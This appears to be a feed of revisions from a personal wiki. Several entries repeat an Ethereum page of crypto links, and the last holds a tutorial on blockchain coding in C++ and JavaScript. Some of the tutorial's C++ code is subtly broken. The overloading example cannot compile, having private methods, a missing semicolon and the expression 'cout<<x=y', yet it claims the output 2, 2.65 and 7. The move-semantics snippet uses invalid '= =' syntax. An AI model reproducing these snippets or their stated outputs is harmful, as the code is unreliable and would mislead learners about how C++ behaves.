&amp;#039;&amp;#039;&amp;#039;Sample Coin : https://www.coinbase.com/usdc&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
Centre, the consortium that mints USDC, collectively holds US$1.00 for every single USDC. These funds are held in a special bank account that is constantly monitored and audited.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Crypto Solutions =&lt;br /&gt;
==AML-Anti Money Laundry Solutions==&lt;br /&gt;
CoinFirm link : https://www.coinfirm.com/&lt;br /&gt;
== OpenZeppelin ==&lt;br /&gt;
* https://docs.openzeppelin.com/openzeppelin/&lt;br /&gt;
&lt;br /&gt;
==Gnosis==&lt;br /&gt;
&lt;br /&gt;
* https://gnosis-safe.io/&lt;br /&gt;
* &lt;br /&gt;
&lt;br /&gt;
==BitGo==&lt;br /&gt;
Institutional digital asset custody, trading, and finance&lt;br /&gt;
* https://www.bitgo.com/&lt;br /&gt;
* https://api.bitgo.com/docs/&lt;br /&gt;
* https://bitgo.github.io/bitgo-docs/&lt;br /&gt;
* https://www.npmjs.com/package/bitgo&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Useful Resources =&lt;br /&gt;
&lt;br /&gt;
* https://awesomeopensource.com/projects/truffle&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Ethereum&amp;diff=1090</id>
		<title>Ethereum</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Ethereum&amp;diff=1090"/>
		<updated>2021-05-31T21:44:40Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;!-- &lt;br /&gt;
&amp;lt;accesscontrol&amp;gt;Administrators&amp;lt;/accesscontrol&amp;gt;&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Official Ethereum Link : https://ethereum.org/en/&lt;br /&gt;
&lt;br /&gt;
=Coin Types=&lt;br /&gt;
== Stable Coins==&lt;br /&gt;
Stablecoins are Ethereum tokens designed to stay at a fixed value, even when the price of ETH changes.&lt;br /&gt;
link: https://ethereum.org/en/stablecoins/#explore&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Sample Coin : https://www.coinbase.com/usdc&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
Centre, the consortium that mints USDC, collectively holds US$1.00 for every single USDC. These funds are held in a special bank account that is constantly monitored and audited.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Crypto Solutions =&lt;br /&gt;
==AML-Anti Money Laundry Solutions==&lt;br /&gt;
CoinFirm link : https://www.coinfirm.com/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Useful Resources =&lt;br /&gt;
&lt;br /&gt;
* https://awesomeopensource.com/projects/truffle&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Ethereum&amp;diff=1089</id>
		<title>Ethereum</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Ethereum&amp;diff=1089"/>
		<updated>2021-05-31T21:42:01Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;!-- &lt;br /&gt;
&amp;lt;accesscontrol&amp;gt;Administrators&amp;lt;/accesscontrol&amp;gt;&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Official Ethereum Link : https://ethereum.org/en/&lt;br /&gt;
&lt;br /&gt;
=Coin Types=&lt;br /&gt;
== Stable Coins==&lt;br /&gt;
Stablecoins are Ethereum tokens designed to stay at a fixed value, even when the price of ETH changes.&lt;br /&gt;
link: https://ethereum.org/en/stablecoins/#explore&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Sample Coin : https://www.coinbase.com/usdc&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
Centre, the consortium that mints USDC, collectively holds US$1.00 for every single USDC. These funds are held in a special bank account that is constantly monitored and audited.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Crypto Solutions =&lt;br /&gt;
==AML-Anti Money Laundry Solutions==&lt;br /&gt;
CoinFirm link : https://www.coinfirm.com/&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Ethereum&amp;diff=1088</id>
		<title>Ethereum</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Ethereum&amp;diff=1088"/>
		<updated>2021-05-31T21:39:22Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;accesscontrol&amp;gt;Administrators,IT:Department,Sales(ro)&amp;lt;/accesscontrol&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Official Ethereum Link : https://ethereum.org/en/&lt;br /&gt;
&lt;br /&gt;
=Coin Types=&lt;br /&gt;
== Stable Coins==&lt;br /&gt;
Stablecoins are Ethereum tokens designed to stay at a fixed value, even when the price of ETH changes.&lt;br /&gt;
link: https://ethereum.org/en/stablecoins/#explore&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Sample Coin : https://www.coinbase.com/usdc&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
Centre, the consortium that mints USDC, collectively holds US$1.00 for every single USDC. These funds are held in a special bank account that is constantly monitored and audited.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Crypto Solutions =&lt;br /&gt;
==AML-Anti Money Laundry Solutions==&lt;br /&gt;
CoinFirm link : https://www.coinfirm.com/&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Ethereum&amp;diff=1087</id>
		<title>Ethereum</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Ethereum&amp;diff=1087"/>
		<updated>2021-05-31T21:25:53Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;accesscontrol&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Official Ethereum Link : https://ethereum.org/en/&lt;br /&gt;
&lt;br /&gt;
=Coin Types=&lt;br /&gt;
== Stable Coins==&lt;br /&gt;
Stablecoins are Ethereum tokens designed to stay at a fixed value, even when the price of ETH changes.&lt;br /&gt;
link: https://ethereum.org/en/stablecoins/#explore&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Sample Coin : https://www.coinbase.com/usdc&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
Centre, the consortium that mints USDC, collectively holds US$1.00 for every single USDC. These funds are held in a special bank account that is constantly monitored and audited.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Crypto Solutions =&lt;br /&gt;
==AML-Anti Money Laundry Solutions==&lt;br /&gt;
CoinFirm link : https://www.coinfirm.com/&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Ethereum&amp;diff=1086</id>
		<title>Ethereum</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Ethereum&amp;diff=1086"/>
		<updated>2021-05-31T20:48:48Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: Protected &amp;quot;Ethereum&amp;quot; ([Edit=Allow only administrators] (indefinite) [Move=Allow only administrators] (indefinite)) [cascading]&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Official Ethereum Link : https://ethereum.org/en/&lt;br /&gt;
&lt;br /&gt;
=Coin Types=&lt;br /&gt;
== Stable Coins==&lt;br /&gt;
Stablecoins are Ethereum tokens designed to stay at a fixed value, even when the price of ETH changes.&lt;br /&gt;
link: https://ethereum.org/en/stablecoins/#explore&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Sample Coin : https://www.coinbase.com/usdc&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
Centre, the consortium that mints USDC, collectively holds US$1.00 for every single USDC. These funds are held in a special bank account that is constantly monitored and audited.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Crypto Solutions =&lt;br /&gt;
==AML-Anti Money Laundry Solutions==&lt;br /&gt;
CoinFirm link : https://www.coinfirm.com/&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Ethereum&amp;diff=1085</id>
		<title>Ethereum</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Ethereum&amp;diff=1085"/>
		<updated>2021-05-31T20:47:30Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: Created page with &amp;quot;Official Ethereum Link : https://ethereum.org/en/  =Coin Types= == Stable Coins== Stablecoins are Ethereum tokens designed to stay at a fixed value, even when the price of ETH...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Official Ethereum Link : https://ethereum.org/en/&lt;br /&gt;
&lt;br /&gt;
=Coin Types=&lt;br /&gt;
== Stable Coins==&lt;br /&gt;
Stablecoins are Ethereum tokens designed to stay at a fixed value, even when the price of ETH changes.&lt;br /&gt;
link: https://ethereum.org/en/stablecoins/#explore&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Sample Coin : https://www.coinbase.com/usdc&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
Centre, the consortium that mints USDC, collectively holds US$1.00 for every single USDC. These funds are held in a special bank account that is constantly monitored and audited.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Crypto Solutions =&lt;br /&gt;
==AML-Anti Money Laundry Solutions==&lt;br /&gt;
CoinFirm link : https://www.coinfirm.com/&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=BlockChain&amp;diff=1084</id>
		<title>BlockChain</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=BlockChain&amp;diff=1084"/>
		<updated>2021-05-31T20:34:13Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* Ethereum */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Blockchain Coding=&lt;br /&gt;
&lt;br /&gt;
Blockchain Coding: The Many different Languages You Need! The blockchain technology is incredibly fascinating. It won’t be far-fetched to think of a future which will be built entirely on it. So, what do you need to learn in order to start developing on the blockchain? Which languages will give you the edge? In this guide, we will go through some of the more major ones.&lt;br /&gt;
&lt;br /&gt;
==Problems with developing blockchain software==&lt;br /&gt;
&lt;br /&gt;
Before we begin, let’s checkout some of the challenges that a blockchain developer faces. Creating and maintaining a public blockchain is not easy because of a number of reasons.&lt;br /&gt;
&lt;br /&gt;
===Reason #1: Security===&lt;br /&gt;
Blockchains, as David Schwartz puts it, should be fortresses. Firstly, the code is public and open for all to see. Anyone can look over the code and check for bugs and vulnerabilities. However, unlike other open code resources, the downside of finding vulnerabilities on blockchain code is massive. Any programmer can hack in and get away with potentially millions and millions of dollars. Because of these legitimate security concerns, development on blockchain is usually very slow.&lt;br /&gt;
&lt;br /&gt;
===Reason #2: Resource Management===&lt;br /&gt;
It is important to keep pace with the network. You cannot fall too far behind and not keep up with all the network demands. You should be well equipped to handle remote and local queries.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Reason #3: Performance===&lt;br /&gt;
The blockchain must always perform at its highest possible capabilities, but for that to happen the language chosen must be extremely versatile. The thing is that there are certain tasks in the blockchain which are parallelizable whilst there are some tasks which can’t be done in parallel.&lt;br /&gt;
&lt;br /&gt;
A good example of “parallelizable” task is digital signature verification. All that you need for signature verification is the key, transaction and the signature. With just three data you can conduct verifications in a parallelized manner.&lt;br /&gt;
&lt;br /&gt;
However, not all the functions on a blockchain should be done that way. Think of transaction execution itself. Multiple transactions can’t be executed in parallel; it needs to be done one at a time to avoid errors like double spends. Some languages are good at parallel operations while some are good in non-parallel operations&lt;br /&gt;
&lt;br /&gt;
===Reason #4: Isolation===&lt;br /&gt;
What is deterministic behavior?&lt;br /&gt;
&lt;br /&gt;
*If A + B = C, then no matter what the circumstances, A+B will always be equal to C. That is called deterministic behavior.&lt;br /&gt;
*Hash functions are deterministic, meaning A’s hash will always be H(A).&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
So, in blockchain development, all transaction operations must be deterministic. You cannot have a transaction that behaves one way and then behaves another way the next day. Similarly, you cannot have smart contracts that work in two different ways in two different machines.&lt;br /&gt;
&lt;br /&gt;
The only solution to this is isolation. Basically you isolate your smart contracts and transactions from non-deterministic elements.&lt;br /&gt;
&lt;br /&gt;
==[[Wallet Guide: How to Protect Your BlockChain]]==&lt;br /&gt;
A cryptocurrency wallet is a digital wallet that you can use to store, send and receive various cryptocurrencies. The wallet doesn’t exactly “store” your money as a real-world wallet does. Instead, it saves your public and private keys which in turn helps you send and receive money(or blockchain data).&lt;br /&gt;
&lt;br /&gt;
more about [[Wallet Guide: How to Protect Your BlockChain]]..&lt;br /&gt;
&lt;br /&gt;
==Blockchain Development Languages==&lt;br /&gt;
we have discussed the main problems that blockchain developers face. Now let’s finally check out some of the languages that the developers can use to code on the blockchain.&lt;br /&gt;
&lt;br /&gt;
===Language #1: C++===&lt;br /&gt;
&lt;br /&gt;
First and foremost, let’s start with the granddaddy of them all, the evergreen C++. C++ was created by Bjarne Stroustrup as an extension of the C language. The Language was designed to have the flexibility and efficiency of the C but with some major differences. The biggest difference between C and C++ is that while C is process-oriented, C++ is object oriented.&lt;br /&gt;
&lt;br /&gt;
What this means is that, in C++, the data and functions are wrapped into one neat little package called “objects” which means that once an object is created, it can easily be called and reused in other programs, which greatly reduces coding time.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Let’s look at the simplest C++ program in the world. The “Hello World” program:&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;c++&amp;quot;&amp;gt;&lt;br /&gt;
#include &amp;lt;iostream.h&amp;gt;&lt;br /&gt;
main()&lt;br /&gt;
{&lt;br /&gt;
cout &amp;lt;&amp;lt; &amp;quot;Hello World!&amp;quot;;&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This code will print: Hello World!&lt;br /&gt;
&lt;br /&gt;
So, why do people still use C++ for coding? Surely there are way more glamorous languages now, why do people still insist on going back to C++? Why is the bitcoin blockchain coded on C++?&lt;br /&gt;
&lt;br /&gt;
Well, as it happens, [[C++]] has certain features that makes it very appealing. (Shout out [[Peter Wiulle]] and [[David Schwartz]] for the following explanation).&lt;br /&gt;
&lt;br /&gt;
====Feature #1: Memory Control====&lt;br /&gt;
&lt;br /&gt;
Not only should blockchains be secured fortresses but they should have effective resource management as well. A blockchain is supposed to interact with a lot of untrusted endpoints while still giving quick service to any and all nodes.&lt;br /&gt;
&lt;br /&gt;
This quick and prompt service is critical for the success of a cryptocurrency like bitcoin. Remember, they are all based on the principle of “consensus”, all nodes on the network must accept and reject the exact same blocks, or else there could be a fork in the chain.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;In order to satisfy all these demands and perform at the highest level, you need tight and complete control over CPU and memory usage. C++ gives that to its users.&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
====Feature #2: Threading====&lt;br /&gt;
&lt;br /&gt;
As we have discussed before, one of the main challenges of the blockchain programming is the integration of tasks that parallelize well and the tasks that don’t parallelize. Most languages specialize in one, however C++’s threading ability is good enough to handle both parallel and non-parallel tasks. A thread is a set of instructions that can be executed simultaneously. Not only does C++ allow fir superb multithreading facilities with effective inter-thread communication, it also optimizes single-thread performance.&lt;br /&gt;
&lt;br /&gt;
====Feature #3: Move Semantics====&lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of C++ is move semantics. Move semantics provides a way for the contents to be moved between objects rather than be copied outright. Let’s checkout the differences between copy semantics and move semantics. (Following data taken from Peter Alexander’s answer in “Stackoverflow”).&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Copy Semantics:&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
assert(b == c);&lt;br /&gt;
a = b;&lt;br /&gt;
assert(a == b &amp;amp;&amp;amp; b == c);&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
So what is happening here? The value of b goes into a and b remains unchanged at the end of the whole thing.&lt;br /&gt;
&lt;br /&gt;
Now, consider this.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Move Semantics:&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
assert( b = = c);&lt;br /&gt;
move (a,b);&lt;br /&gt;
assert (a = =c );&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;What is happening here?&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
Can you see the difference between the two blocks of codes?&lt;br /&gt;
&lt;br /&gt;
When we are using the move semantics, the value of “b” need not be the unchanged.  That is the difference between copy semantics and move semantics. The biggest advantage of move semantics is that you can get copies of certain data only when you need them, which greatly decreases redundancy in the code and gives a huge performance boost. So as you can see, this efficient memory management and high performance are both desirable for the blockchain.&lt;br /&gt;
&lt;br /&gt;
====Feature #4: Compile Time Polymorphism====&lt;br /&gt;
&lt;br /&gt;
What is polymorphism?&lt;br /&gt;
&lt;br /&gt;
Remember when we called C++ an “object oriented programming (OOP) language”? Polymorphism happens to be an OOP property. Using polymorphism, you use a particular feature in more than one ways. In C++ polymorphism can be used in two ways:&lt;br /&gt;
&lt;br /&gt;
*Compile time polymorphism.&lt;br /&gt;
*Run time polymorphism.&lt;br /&gt;
&lt;br /&gt;
Over here, we will only be focusing on compile time polymorphism. There are two ways that C++ implements compile time polymorphism:&lt;br /&gt;
&lt;br /&gt;
*Function Overloading.&lt;br /&gt;
*Operator Overloading.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Function Overloading:&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
Function overloading is when you have many functions of the same name but with different parameter intake.&lt;br /&gt;
&lt;br /&gt;
Consider this program:&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;c++&amp;quot;&amp;gt;&lt;br /&gt;
#include &amp;lt;bits/stdc++.h&amp;gt;&lt;br /&gt;
using namespace std;&lt;br /&gt;
&lt;br /&gt;
class A&lt;br /&gt;
{&lt;br /&gt;
void func (int x)  //first instance of the function takes only one integer value&lt;br /&gt;
{&lt;br /&gt;
cout&amp;lt;&amp;lt;x&amp;lt;&amp;lt;endl;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
void func (double x) //second instance of the function takes only one double value&lt;br /&gt;
{&lt;br /&gt;
cout&amp;lt;&amp;lt;x&amp;lt;&amp;lt;endl;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
void func (int x, int y) //third instance of the function takes two integer values&lt;br /&gt;
{&lt;br /&gt;
cout&amp;lt;&amp;lt;x=y&amp;lt;&amp;lt;endl;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
int main()&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
A obj1 //making one object of the class A&lt;br /&gt;
//now we are going to call the functions&lt;br /&gt;
obj1.func(2);&lt;br /&gt;
obj1.func(2.65);&lt;br /&gt;
obj1.func(2,5);&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now when you run this function the output will be:&lt;br /&gt;
&lt;br /&gt;
*2&lt;br /&gt;
*2.65&lt;br /&gt;
*7&lt;br /&gt;
&lt;br /&gt;
So, as you can see, the same function func() was used in 3 different ways.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Operator Overloading:&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
In C++ the same operator can have more than one meaning.&lt;br /&gt;
&lt;br /&gt;
*Eg. “+” can be used both for mathematical addition and for concatenation.&lt;br /&gt;
*Concatenation basically means taking two strings and combining them as one.&lt;br /&gt;
*So 3+4 = 7.&lt;br /&gt;
&lt;br /&gt;
AND&lt;br /&gt;
&lt;br /&gt;
*Block+geeks = Blockgeeks.&lt;br /&gt;
*The same operator, did two different functions, this is operator overloading.&lt;br /&gt;
&lt;br /&gt;
The Compile time polymorphism helps a lot in blockchain development. It helps in putting responsibilities separately in various functions and, in turn, boosting the performance of the whole system.&lt;br /&gt;
&lt;br /&gt;
====Feature #5: Code Isolation====&lt;br /&gt;
&lt;br /&gt;
C++ has namespace features which can be imported from one program to another. Namespace helps in avoiding name collisions. Also, since C++ has classes, it can act as boundaries between various APIs and help in making clear separation.&lt;br /&gt;
&lt;br /&gt;
A class in C++ is a user defined type or data structure declared with keyword class that has data and functions as its members. You can access the functions declared in the class by declaring objects of that particular class.&lt;br /&gt;
&lt;br /&gt;
====Feature #6: Maturity====&lt;br /&gt;
&lt;br /&gt;
The language is both mature and regularly updated. There are at least 3 solid compilers, as David Schwartz says, and the new features are aimed at solving real issues. Debuggers and analytical tools of all kinds are available for everything from performance profiling to automatic detection of issues of all kinds. This means the language is constantly growing to incorporate newer and better features.&lt;br /&gt;
&lt;br /&gt;
Because of the above features, [[Satoshi Nakamoto]] chose C++ to be the base language of the bitcoin source code.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Language #2: Javascript===&lt;br /&gt;
&lt;br /&gt;
Up next we have Javascript.&lt;br /&gt;
&lt;br /&gt;
Along with HTML and CSS it is one of the three core technologies in World Wide Web Content Production. Javascript is usually used to create highly interactive webpages. So, now we will see how to create a very simple blockchain using Javascript. Huge shoutout to savjee.be for the content in this section.&lt;br /&gt;
&lt;br /&gt;
Suppose, we want to create a simple blockchain in Javascript. Before we do so, there are certain things that we need to address.&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;What is a blockchain and how exactly does it work…code-wise?&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
A blockchain is basically a chain of blocks which contain data. It is basically a glorified linked list. However, what makes it so special? A blockchain is immutable. Meaning, once a data goes inside a block, it can never be changed. How does a blockchain attain immutability? It is because of a simple but ingenious mechanism called “hashing”. Checkout the diagram below:&lt;br /&gt;
&lt;br /&gt;
https://blockgeeks.com/wp-content/uploads/2017/11/image1.png&lt;br /&gt;
&lt;br /&gt;
Image Courtesy: Lauri Hartikka medium article&lt;br /&gt;
&lt;br /&gt;
Each block is connected to the previous block via a hash pointer which contains the hash of the previous block. So, how does this make the chain immutable?&lt;br /&gt;
&lt;br /&gt;
One of the most fascinating properties of [https://blockgeeks.com/guides/cryptocurrencies-cryptography/ cryptographic hash functions] is that if you even change the input by a little bit, it can greatly affect the output hash. Eg. Check this out:&lt;br /&gt;
&lt;br /&gt;
https://blockgeeks.com/wp-content/uploads/2017/11/coding.png&lt;br /&gt;
&lt;br /&gt;
Just changing the first “T” from upper to lower case drastically changed the output hash so much.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;So, how does this affect the blockchain?&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
Each block is connected to the previous one via the hash pointer. So, if someone were to tamper the data in a block, it would change the hash drastically and as a result, end up affecting the whole chain (as all the blocks are linked). This would freeze up the chain which is an impossibility and hence the blocks remain unchanged.&lt;br /&gt;
&lt;br /&gt;
So, how do we make a block? What does a simple block consist of? In our simple cryptocoin that we are going to make (Let’s call it “BlockGeeksCoin”), each block will have the following pieces of information:&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Index: To know the block number.&lt;br /&gt;
*Timestamp: To know the time of creation.&lt;br /&gt;
*Data: The data inside the block.&lt;br /&gt;
*Previous Hash: The hash of the previous block.&lt;br /&gt;
*Hash: The Hash of the current block.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Before we continue. You need to understand certain terms that we are going to use in our program:&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
*this: The “this” keyword is invoked inside a function and enables you to access the values inside a specific object that calls that particular function.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Constructor: A constructor is a special function which can help create and initialize an object within a class. Each class is restricted to only one constructor.&lt;br /&gt;
Now that that’s done, let’s start making our block.&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Creating the Block&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;javascript&amp;quot;&amp;gt;&lt;br /&gt;
const SHA256 = require(&amp;quot;crypto-js/sha256&amp;quot;); &lt;br /&gt;
&lt;br /&gt;
class Block &lt;br /&gt;
{ &lt;br /&gt;
constructor(index, timestamp, data, previousHash = &amp;#039;&amp;#039;) &lt;br /&gt;
{ &lt;br /&gt;
this.index = index; &lt;br /&gt;
this.previousHash = previousHash; &lt;br /&gt;
this.timestamp = timestamp; &lt;br /&gt;
this.data = data; &lt;br /&gt;
this.hash = this.calculateHash(); &lt;br /&gt;
} &lt;br /&gt;
&lt;br /&gt;
calculateHash() &lt;br /&gt;
{ &lt;br /&gt;
return SHA256(this.index + this.previousHash + this.timestamp + JSON.stringify(this.data)).toString(); &lt;br /&gt;
} &lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Code Analysis&lt;br /&gt;
&lt;br /&gt;
Ok, so this right here is out block. So, in the first line of the code we called the crypto-js library because the sha256 hash function is not available in JavaScript.&lt;br /&gt;
&lt;br /&gt;
Next, we invoked a constructor inside the class to call for objects which will have certain values. The thing that probably catches your eye is the calculateHash() function. Let’s see what exactly is it doing.&lt;br /&gt;
&lt;br /&gt;
In a block, we take all the contents and hash them to get the hash of that particular block. We are using the JSON.stringify function to turn the data of the block into string to hash it.&lt;br /&gt;
&lt;br /&gt;
Ok, so we have the block ready and good to go. Now let’s connect the blocks together into a blockchain.&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Creating the blockchain&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;javascript&amp;quot;&amp;gt;&lt;br /&gt;
class Blockchain&lt;br /&gt;
{&lt;br /&gt;
//Section 1 Genesis block creation&lt;br /&gt;
 constructor() &lt;br /&gt;
{ &lt;br /&gt;
this.chain = [this.createGenesisBlock()]; &lt;br /&gt;
} &lt;br /&gt;
&lt;br /&gt;
createGenesisBlock() &lt;br /&gt;
{&lt;br /&gt;
 return new Block(0, &amp;quot;01/01/2017&amp;quot;, &amp;quot;Genesis block&amp;quot;, &amp;quot;0&amp;quot;); &lt;br /&gt;
} &lt;br /&gt;
&lt;br /&gt;
//section 2 adding new blocks&lt;br /&gt;
getLatestBlock() &lt;br /&gt;
{ &lt;br /&gt;
return this.chain[this.chain.length - 1]; &lt;br /&gt;
} &lt;br /&gt;
&lt;br /&gt;
addBlock(newBlock) { &lt;br /&gt;
newBlock.previousHash = this.getLatestBlock().hash; &lt;br /&gt;
newBlock.hash = newBlock.calculateHash(); &lt;br /&gt;
this.chain.push(newBlock); &lt;br /&gt;
} &lt;br /&gt;
&lt;br /&gt;
//section 3 validating the chain&lt;br /&gt;
isChainValid() &lt;br /&gt;
{ &lt;br /&gt;
for (let i = 1; i &amp;lt; this.chain.length; i++)&lt;br /&gt;
{ &lt;br /&gt;
const currentBlock = this.chain[i]; &lt;br /&gt;
const previousBlock = this.chain[i - 1]; &lt;br /&gt;
if (currentBlock.hash !== currentBlock.calculateHash()) { &lt;br /&gt;
return false; &lt;br /&gt;
} &lt;br /&gt;
&lt;br /&gt;
if (currentBlock.previousHash !== previousBlock.hash) &lt;br /&gt;
{ &lt;br /&gt;
return false; &lt;br /&gt;
} &lt;br /&gt;
} &lt;br /&gt;
return true; &lt;br /&gt;
} &lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Code Analysis&lt;br /&gt;
&lt;br /&gt;
Ok, so a lot of things are going on in the chain above, let’s break it down to sections.&lt;br /&gt;
&lt;br /&gt;
====Section 1: The Genesis Block====&lt;br /&gt;
What is the genesis block?&lt;br /&gt;
&lt;br /&gt;
The genesis block is the first block of the blockchain, and the reason why it is special is because while every bock points to the block previous to it, the genesis block doesn’t point at anything.  So, the moment a new chain is created, the genesis block is invoked immediately. Also, you can see a “createGenesisBlock()” function wherein we have given the data of the block manually:&lt;br /&gt;
&lt;br /&gt;
